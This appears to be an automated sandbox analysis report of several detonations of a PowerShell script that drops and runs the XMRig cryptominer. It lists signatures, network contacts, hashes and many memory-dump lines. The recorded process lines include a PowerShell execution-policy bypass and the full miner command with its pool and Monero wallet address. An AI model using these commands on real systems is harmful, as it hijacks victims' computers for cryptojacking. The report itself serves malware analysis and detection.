memory/4964-76-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-77-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-78-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-79-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-80-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-81-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-82-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-83-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-84-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-85-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-86-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-87-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-88-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-89-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-90-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-91-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-92-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-93-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-94-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-95-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-96-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-97-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-98-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-99-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-100-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-101-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-102-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-103-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-104-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-105-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-106-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-107-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-108-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-109-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-110-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-111-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-112-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-113-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-114-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-115-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-116-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-117-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-118-0x00007FF703260000-0x00007FF703E93000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:39

Platform

win10-20240404-en

Max time kernel

1795s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 42.56.20.217.in-addr.arpa udp

Files

memory/1012-4-0x00007FF840123000-0x00007FF840124000-memory.dmp

memory/1012-5-0x000001C7BFD00000-0x000001C7BFD22000-memory.dmp

memory/1012-8-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/1012-9-0x000001C7BFE30000-0x000001C7BFEA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_njbhqglk.04v.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1012-10-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/1012-25-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/1012-29-0x00007FF840123000-0x00007FF840124000-memory.dmp

memory/1012-30-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/1012-31-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/1012-51-0x000001C7BFCA0000-0x000001C7BFCB2000-memory.dmp

memory/1012-64-0x000001C7BFC30000-0x000001C7BFC3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1600-93-0x00000199700E0000-0x0000019970100000-memory.dmp

memory/1012-94-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/1600-95-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-96-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-97-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-98-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-99-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-100-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-101-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-102-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-103-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-104-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-105-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-106-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-107-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-108-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-109-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-110-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-111-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-112-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-113-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-114-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-115-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-116-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-117-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-118-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-119-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-120-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-121-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-122-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-123-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-124-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-125-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-126-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-127-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-128-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-129-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-130-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-131-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-132-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-133-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-134-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-135-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-136-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-137-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-138-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-139-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-140-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-141-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-142-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-143-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-144-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-145-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-146-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-147-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-148-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-149-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-150-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-151-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-152-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-153-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-154-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-155-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-156-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

memory/1600-157-0x00007FF709A80000-0x00007FF70A6B3000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:46

Platform

win10-20240404-en

Max time kernel

1793s

Max time network

1767s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/4892-3-0x00007FF868DC3000-0x00007FF868DC4000-memory.dmp

memory/4892-5-0x000001E63E6C0000-0x000001E63E6E2000-memory.dmp

memory/4892-8-0x00007FF868DC0000-0x00007FF8697AC000-memory.dmp

memory/4892-9-0x000001E63E870000-0x000001E63E8E6000-memory.dmp

memory/4892-18-0x00007FF868DC0000-0x00007FF8697AC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zfqk2kdr.k55.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4892-26-0x00007FF868DC0000-0x00007FF8697AC000-memory.dmp

memory/4892-62-0x000001E63E850000-0x000001E63E85A000-memory.dmp

memory/4892-49-0x000001E63EB20000-0x000001E63EB32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/204-91-0x000002C9B1D30000-0x000002C9B1D50000-memory.dmp

memory/204-92-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/4892-93-0x00007FF868DC3000-0x00007FF868DC4000-memory.dmp

memory/204-94-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/4892-95-0x00007FF868DC0000-0x00007FF8697AC000-memory.dmp

memory/4892-96-0x00007FF868DC0000-0x00007FF8697AC000-memory.dmp

memory/204-97-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-98-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-99-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-100-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-101-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-102-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-103-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-104-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-105-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-106-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-107-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-108-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-109-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-110-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-111-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-112-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-113-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-114-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-115-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-116-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-117-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-118-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-119-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-120-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-121-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-122-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-123-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-124-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-125-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-126-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-127-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-128-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-129-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-130-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-131-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-132-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-133-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-134-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-135-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-136-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-137-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-138-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-139-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-140-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-141-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-142-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-143-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-144-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-145-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-146-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-147-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-148-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-149-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-150-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-151-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-152-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-153-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-154-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-155-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-156-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

memory/204-157-0x00007FF78D600000-0x00007FF78E233000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:39

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1776s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 98.56.20.217.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
NL 23.62.61.114:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
